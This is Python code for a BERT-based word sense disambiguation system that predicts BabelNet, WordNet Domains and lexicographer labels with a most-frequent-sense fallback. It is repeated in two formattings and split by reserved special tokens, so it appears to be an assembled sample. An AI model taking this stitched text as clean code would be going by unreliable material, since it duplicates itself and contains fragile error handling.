:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> LEXICOGRAPHER PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
bn2lex = get_bn2lex()
filename = filename[:-3] + 'lexicon.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
2][0], vocab=vocab_label_lex, enable_coarse_grained=3,
vocab_for_coarse=bn2lex)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def __predict(input_path: str, resources_path: str) ->Tuple:
"""
Actually predicts a sentence and returns the predictions in the requested formats
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: The actual prediction by the network
"""
train, etree_data = load_dataset(input_path)
train = [dato for dato in train if dato]
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(
vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],
dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)
tokenizatore = modello.tokenizatore
modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'
)
to_return = []
sentences_xml_elements = etree_data.xpath('/*/*/*')
for sentence in train:
feature_1, feature_2, feature_3 = (
convert_sentence_to_features_no_padding(sentence, tokenizatore))
results = modello.model.predict({'input_word_ids': feature_1,
'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)
to_return.append(results)
del vocab_label_lex
del vocab_label_wndmn
del vocab_label_bn
return to_return, sentences_xml_elements
def __write_result(filename: str, frase, resources_path: str, outputh_path:
str, predictions, vocab=None, enable_coarse_grained: int=1,
vocab_for_coarse=None) ->int:
"""
Write results in the file system
:param filename: the name of the file to save
:param frase: the object from which recover the sentence
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:param output_path: the path of the output file (where you save your predictions)
:param predictions: the predictions made by the system
:param vocab: the vocab needed for giving a sense
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab_for_coarse: The vocab in support of mode 2 or 3
:return: 1 if succeeds
"""
global mfs_counter
bn2wn = get_bn2wn()
lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')
to_write = []
for index, parola in enumerate(frase):
name = parola.xpath('name()')
if name == 'instance':
id = parola.get('id')
list_of_possible_senses_first_step = lemma2wn.get(parola.text)
if not list_of_possible_senses_first_step:
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
mfs_counter += 1
to_write.append((id, the_actual_meaning))
continue
list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(
list_of_possible_senses_first_step, bn2wn)
candidates, list_of_possible_senses_bn_version = (
create_custom_label(list_of_possible_senses_bn_version,
parola.text, vocab, predictions[index],
enable_coarse_grained=enable_coarse_grained))
the_actual_meaning = None
if candidates:
argmax = np.argmax(candidates)
the_actual_meaning = list_of_possible_senses_bn_version[argmax]
else:
mfs_counter += 1
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
to_write.append((id, the_actual_meaning))
with open(outputh_path + '/' + filename, 'a') as test_saving:
for tupla in to_write:
test_saving.write(tupla[0] + ' ' + tupla[1] + '\n')
del to_write
del lemma2wn
del bn2wn
return 1
def MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:
"""
Returns the sense by applying the Most Frequent Sense (MFS) strategy
:param parola: the Element object to which associate a sense
:param vocab: the vocab needed for giving a sense
:param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:return: the chosen sense with the MFS technique
"""
pos = parola.get('pos')
pos_input = __decide_pos(pos)
wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
try:
wordnet_object = wordnet_object[0]
except:
print(wordnet_object)
print(parola.text)
wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8
) + wordnet_object.pos()
the_actual_meaning = next(key for key, value in vocab.items() if
wn_synset in value)
to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=
vocab2, pred_case=pred_case)
return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:
Dict=None) ->str:
"""
Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction
:param value: The Value from which to extrapolate the actual meaning found
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab: The vocab in support of mode 2 or 3.
:return: the actual meaning found with MFS
"""
the_meaning_to_explot = __type_checker(value)
if pred_case == 1:
return the_meaning_to_explot
if pred_case == 2:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0] if to_return else 'factotum'
if pred_case == 3:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0]
def __type_checker(value: object) ->str:
"""
Checks the type of the object and, accordingly, returns it
:param value: the value to examinate
:return: a string that is the value expected
"""
if type(value) == str:
return value
if type(value) == list:
return value[0]
def __decide_pos(pos: str) ->str:
"""
Decides the WN representation of the given pos in input
:param pos: the pos to interpret with WordNet
:return: the WN representation of the given pos
"""
to_return = None
if pos == 'NOUN':
to_return = 'n'
if pos == 'VERB':
to_return = 'v'
if pos == 'ADJ':
to_return = 'a'
if pos == 'ADV':
to_return = 'r'
return to_return
def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:
"""
Cast the given list (which contains only WN ids) to Babelnet IDs
:param list_of_bn: the list to cast
:param vocab: the vocabulary to use to perform the conversion
:return: the converted list
"""
list_of_possible_senses_bn_version = []
for candidate in list_of_bn:
is_it_here = next(key for key, value in vocab.items() if candidate in
value)
if is_it_here:
list_of_possible_senses_bn_version.append(is_it_here if type(
is_it_here) == str else is_it_here[0])
return list_of_possible_senses_bn_version
def create_custom_label(list_of_possible_senses: List, word: str, vocab:
Dict, predictions, enable_coarse_grained: int=1) ->List:
"""
Converts the list of babelnet IDS to a number and outputs the converted list
:param list_of_possible_senses: the list that contains all the babelnet's IDs
:param word: the word for which we are predicting the sense in a specific moment
:param vocab: the vocabulary Word -> Serial to exploit for the conversion
:param predictions: the predictions made by the system
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:
1 --> The flow will still be the same
2,3 -> Flow will change, triggering the first step for the coarse-grained approach.
:return: a List with the IDs converted
"""
to_return = []
list_of_indices_to_delete = []
for indice in range(len(list_of_possible_senses)):
new_string = word + '_' + list_of_possible_senses[indice
] if enable_coarse_grained == 1 else list_of_possible_senses[indice
]
conversion = None
try:
conversion = int(vocab[new_string])
to_return.append(predictions[conversion])
except:
list_of_indices_to_delete.append(indice)
continue
if list_of_indices_to_delete:
list_of_possible_senses = [list_of_possible_senses[prov_index] for
prov_index in range(len(list_of_possible_senses)) if prov_index
not in list_of_indices_to_delete]
return to_return, list_of_possible_senses
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def predict_babelnet(input_path: str, output_path: str, resources_path: str
) ->None:
global mfs_counter
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
print('>>>> BABELNET PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'babelnet.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
0][0], vocab=vocab_label_bn, enable_coarse_grained=1,
vocab_for_coarse=None)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_wordnet_domains(input_path: str, output_path: str,
resources_path: str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> WORDNET DOMAINS PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
correctly_saved = 0
bn2wndom = get_bn2wndomains()
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'wndomains.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,
vocab_for_coarse=bn2wndom)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_lexicographer(input_path: str, output_path: str, resources_path:
str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> LEXICOGRAPHER PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
bn2lex = get_bn2lex()
filename = filename[:-3] + 'lexicon.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
2][0], vocab=vocab_label_lex, enable_coarse_grained=3,
vocab_for_coarse=bn2lex)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def __predict(input_path: str, resources_path: str) ->Tuple:
"""
Actually predicts a sentence and returns the predictions in the requested formats
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: The actual prediction by the network
"""
train, etree_data = load_dataset(input_path)
train = [dato for dato in train if dato]
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(
vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],
dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)
tokenizatore = modello.tokenizatore
modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'
)
to_return = []
sentences_xml_elements = etree_data.xpath('/*/*/*')
for sentence in train:
feature_1, feature_2, feature_3 = (
convert_sentence_to_features_no_padding(sentence, tokenizatore))
results = modello.model.predict({'input_word_ids': feature_1,
'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)
to_return.append(results)
del vocab_label_lex
del vocab_label_wndmn
del vocab_label_bn
return to_return, sentences_xml_elements
def __write_result(filename: str, frase, resources_path: str, outputh_path:
str, predictions, vocab=None, enable_coarse_grained: int=1,
vocab_for_coarse=None) ->int:
"""
Write results in the file system
:param filename: the name of the file to save
:param frase: the object from which recover the sentence
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:param output_path: the path of the output file (where you save your predictions)
:param predictions: the predictions made by the system
:param vocab: the vocab needed for giving a sense
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab_for_coarse: The vocab in support of mode 2 or 3
:return: 1 if succeeds
"""
global mfs_counter
bn2wn = get_bn2wn()
lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')
to_write = []
for index, parola in enumerate(frase):
name = parola.xpath('name()')
if name == 'instance':
id = parola.get('id')
list_of_possible_senses_first_step = lemma2wn.get(parola.text)
if not list_of_possible_senses_first_step:
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
mfs_counter += 1
to_write.append((id, the_actual_meaning))
continue
list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(
list_of_possible_senses_first_step, bn2wn)
candidates, list_of_possible_senses_bn_version = (
create_custom_label(list_of_possible_senses_bn_version,
parola.text, vocab, predictions[index],
enable_coarse_grained=enable_coarse_grained))
the_actual_meaning = None
if candidates:
argmax = np.argmax(candidates)
the_actual_meaning = list_of_possible_senses_bn_version[argmax]
else:
mfs_counter += 1
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
to_write.append((id, the_actual_meaning))
with open(outputh_path + '/' + filename, 'a') as test_saving:
for tupla in to_write:
test_saving.write(tupla[0] + ' ' + tupla[1] + '\n')
del to_write
del lemma2wn
del bn2wn
return 1
def MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:
"""
Returns the sense by applying the Most Frequent Sense (MFS) strategy
:param parola: the Element object to which associate a sense
:param vocab: the vocab needed for giving a sense
:param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:return: the chosen sense with the MFS technique
"""
pos = parola.get('pos')
pos_input = __decide_pos(pos)
wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
try:
wordnet_object = wordnet_object[0]
except:
print(wordnet_object)
print(parola.text)
wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8
) + wordnet_object.pos()
the_actual_meaning = next(key for key, value in vocab.items() if
wn_synset in value)
to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=
vocab2, pred_case=pred_case)
return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:
Dict=None) ->str:
"""
Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction
:param value: The Value from which to extrapolate the actual meaning found
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab: The vocab in support of mode 2 or 3.
:return: the actual meaning found with MFS
"""
the_meaning_to_explot = __type_checker(value)
if pred_case == 1:
return the_meaning_to_explot
if pred_case == 2:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0] if to_return else 'factotum'
if pred_case == 3:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0]
def __type_checker(value: object) ->str:
"""
Checks the type of the object and, accordingly, returns it
:param value: the value to examinate
:return: a string that is the value expected
"""
if type(value) == str:
return value
if type(value) == list:
return value[0]
def __decide_pos(pos: str) ->str:
"""
Decides the WN representation of the given pos in input
:param pos: the pos to interpret with WordNet
:return: the WN representation of the given pos
"""
to_return = None
if pos == 'NOUN':
to_return = 'n'
if pos == 'VERB':
to_return = 'v'
if pos == 'ADJ':
to_return = 'a'
if pos == 'ADV':
to_return = 'r'
return to_return
def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:
"""
Cast the given list (which contains only WN ids) to Babelnet IDs
:param list_of_bn: the list to cast
:param vocab: the vocabulary to use to perform the conversion
:return: the converted list
"""
list_of_possible_senses_bn_version = []
for candidate in list_of_bn:
is_it_here = next(key for key, value in vocab.items() if candidate in
value)
if is_it_here:
list_of_possible_senses_bn_version.append(is_it_here if type(
is_it_here) == str else is_it_here[0])
return list_of_possible_senses_bn_version
def create_custom_label(list_of_possible_senses: List, word: str, vocab:
Dict, predictions, enable_coarse_grained: int=1) ->List:
"""
Converts the list of babelnet IDS to a number and outputs the converted list
:param list_of_possible_senses: the list that contains all the babelnet's IDs
:param word: the word for which we are predicting the sense in a specific moment
:param vocab: the vocabulary Word -> Serial to exploit for the conversion
:param predictions: the predictions made by the system
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:
1 --> The flow will still be the same
2,3 -> Flow will change, triggering the first step for the coarse-grained approach.
:return: a List with the IDs converted
"""
to_return = []
list_of_indices_to_delete = []
for indice in range(len(list_of_possible_senses)):
new_string = word + '_' + list_of_possible_senses[indice
] if enable_coarse_grained == 1 else list_of_possible_senses[indice
]
conversion = None
try:
conversion = int(vocab[new_string])
to_return.append(predictions[conversion])
except:
list_of_indices_to_delete.append(indice)
continue
if list_of_indices_to_delete:
list_of_possible_senses = [list_of_possible_senses[prov_index] for
prov_index in range(len(list_of_possible_senses)) if prov_index
not in list_of_indices_to_delete]
return to_return, list_of_possible_senses
if __name__ == '__main__':
predict_babelnet(
'/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml'
, '../output',
'/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources'
)
<|reserved_special_token_1|>
from model import WSD
from data_preprocessing import load_dataset, create_mapping_dictionary, reload_word_mapping,get_bn2wn,get_bn2wndomains, get_bn2lex
from typing import List, Dict, Tuple
from prova import convert_sentence_to_features_no_padding
import numpy as np
import os
from nltk.corpus import wordnet
mfs_counter = 0
def predict_babelnet(input_path : str, output_path : str, resources_path : str) -> None:
global mfs_counter
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
print(">>>> BABELNET PREDICTION")
prediction_results, sentences_xml_elements = __predict(input_path,resources_path)
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3]+"babelnet.gold.key.txt"
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename,
sentences_xml_elements[index],
resources_path, output_path,
prediction_results[index][0][0],
vocab=vocab_label_bn,
enable_coarse_grained=1,
vocab_for_coarse=None)
print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results)))
del prediction_results
print("Of these, {} were MFS".format(mfs_counter))
mfs_counter = 0
return
def predict_wordnet_domains(input_path : str, output_path : str, resources_path : str) -> None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print(">>>> WORDNET DOMAINS PREDICTION")
prediction_results, sentences_xml_elements = __predict(input_path,resources_path)
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
correctly_saved = 0
bn2wndom = get_bn2wndomains()
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3]+"wndomains.gold.key.txt"
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename,
sentences_xml_elements[index],
resources_path, output_path,
prediction_results[index][1][0],
vocab=vocab_label_wndmn,
enable_coarse_grained=2,
vocab_for_coarse=bn2wndom)
print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results)))
del prediction_results
print("Of these, {} were MFS".format(mfs_counter))
mfs_counter = 0
return
def predict_lexicographer(input_path : str, output_path : str, resources_path : str) -> None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print(">>>> LEXICOGRAPHER PREDICTION")
prediction_results, sentences_xml_elements = __predict(input_path, resources_path)
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
bn2lex = get_bn2lex()
filename = filename[:-3] + "lexicon.gold.key.txt"
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename,
sentences_xml_elements[index],
resources_path,output_path,
prediction_results[index][2][0],
vocab= vocab_label_lex,
enable_coarse_grained=3,
vocab_for_coarse=bn2lex)
print("Successfully saved {} out of {}".format(correctly_saved, len(prediction_results)))
del prediction_results
print("Of these, {} were MFS".format(mfs_counter))
mfs_counter = 0
return
def __predict(input_path : str, resources_path : str) -> Tuple:
"""
Actually predicts a sentence and returns the predictions in the requested formats
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: The actual prediction by the network
"""
train, etree_data = load_dataset(input_path)
train = [dato for dato in train if dato]
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
modello = WSD(resources_path+"/vocabularies/bert_vocab.txt", [len(vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)], dropout=0.1, recurrent_dropout=0.1,learning_rate=0.0003)
tokenizatore = modello.tokenizatore
modello.model.load_weights(resources_path+"/saved_model/model_20_2.14.h5")
to_return = []
sentences_xml_elements = etree_data.xpath("/*/*/*")
for sentence in train:
feature_1, feature_2, feature_3 = convert_sentence_to_features_no_padding(sentence,tokenizatore)
results = modello.model.predict(
{'input_word_ids': feature_1, 'input_mask': feature_2, 'segment_ids': feature_3},
verbose=1
)
to_return.append(results)
del vocab_label_lex
del vocab_label_wndmn
del vocab_label_bn
return to_return, sentences_xml_elements
def __write_result(filename: str,
frase,
resources_path: str,
outputh_path: str,
predictions,
vocab = None,
enable_coarse_grained: int = 1,
vocab_for_coarse = None) -> int:
"""
Write results in the file system
:param filename: the name of the file to save
:param frase: the object from which recover the sentence
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:param output_path: the path of the output file (where you save your predictions)
:param predictions: the predictions made by the system
:param vocab: the vocab needed for giving a sense
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab_for_coarse: The vocab in support of mode 2 or 3
:return: 1 if succeeds
"""
global mfs_counter
bn2wn = get_bn2wn()
lemma2wn = reload_word_mapping(resources_path+"/mapping/lemma2wn.txt")
to_write = []
for index, parola in enumerate(frase):
name = parola.xpath('name()')
if name == 'instance':
id = parola.get('id')
list_of_possible_senses_first_step = lemma2wn.get(parola.text)
if not list_of_possible_senses_first_step:
# MFS
the_actual_meaning = MFS(parola,
bn2wn,
vocab2=vocab_for_coarse,
pred_case=enable_coarse_grained)
mfs_counter += 1
to_write.append((id, the_actual_meaning))
continue
list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(list_of_possible_senses_first_step, bn2wn)
candidates,list_of_possible_senses_bn_version = create_custom_label(list_of_possible_senses_bn_version,
parola.text,
vocab,
predictions[index],
enable_coarse_grained=enable_coarse_grained)
the_actual_meaning = None
if candidates:
argmax = np.argmax(candidates)
the_actual_meaning = list_of_possible_senses_bn_version[argmax]
else:
#MFS
mfs_counter += 1
the_actual_meaning = MFS(parola,
bn2wn,
vocab2=vocab_for_coarse,
pred_case=enable_coarse_grained)
to_write.append((id, the_actual_meaning))
with open(outputh_path + "/"+filename, "a") as test_saving:
for tupla in to_write:
test_saving.write(tupla[0] + " " + tupla[1]+"\n")
del to_write
del lemma2wn
del bn2wn
return 1
def MFS(parola, vocab: Dict, vocab2:Dict = None, pred_case: int = 1) -> str:
"""
Returns the sense by applying the Most Frequent Sense (MFS) strategy
:param parola: the Element object to which associate a sense
:param vocab: the vocab needed for giving a sense
:param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:return: the chosen sense with the MFS technique
"""
pos = parola.get('pos')
pos_input = __decide_pos(pos)
wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
try:
wordnet_object = wordnet_object[0]
except:
print(wordnet_object)
print(parola.text)
wn_synset = "wn:" + str(wordnet_object.offset()).zfill(8) + wordnet_object.pos()
the_actual_meaning = next(key for key, value in vocab.items() if wn_synset in value)
to_return = __extrapolate_value_for_MFS(the_actual_meaning,vocab=vocab2, pred_case=pred_case)
return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int = 1, vocab: Dict = None) -> str:
"""
Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction
:param value: The Value from which to extrapolate the actual meaning found
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
